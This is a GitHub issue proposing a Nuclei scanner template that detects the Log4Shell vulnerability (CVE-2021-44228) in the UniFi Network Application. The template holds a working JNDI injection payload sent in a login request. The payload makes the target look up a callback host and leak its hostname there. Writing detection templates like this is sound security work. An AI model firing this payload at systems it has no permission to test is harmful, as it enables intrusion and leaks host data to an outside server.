### ISSUE TITLE
CVE-2021-44228 (log4j) in UniFi Network Application

### ISSUE THREAD

**Issue by KrE80r** [projectdiscovery/nuclei-templates#3393]
### Template Information:

Nuclei template to exploit CVE-2021-44228 (log4j) in UniFi Network Application 

### Nuclei Template:

```yaml
info:
  name: Remote code injection in Log4j
  author: KrE80r
  severity: critical
  description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application .
  reference:
    - https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
    - https://twitter.com/sprocket_ed/status/1473301038832701441
  tags: cve,cve2021,rce,,log4j

requests:
  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 109
        Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
        Sec-Ch-Ua-Mobile: ?0
        User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
        Sec-Ch-Ua-Platform: "macOS"
        Content-Type: application/json; charset=utf-8
        Accept: */*
        Origin: https://{{Hostname}}
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Referer: https://{{Hostname}}/manage/account/login?redirect=%2Fmanage
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9


        {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

```
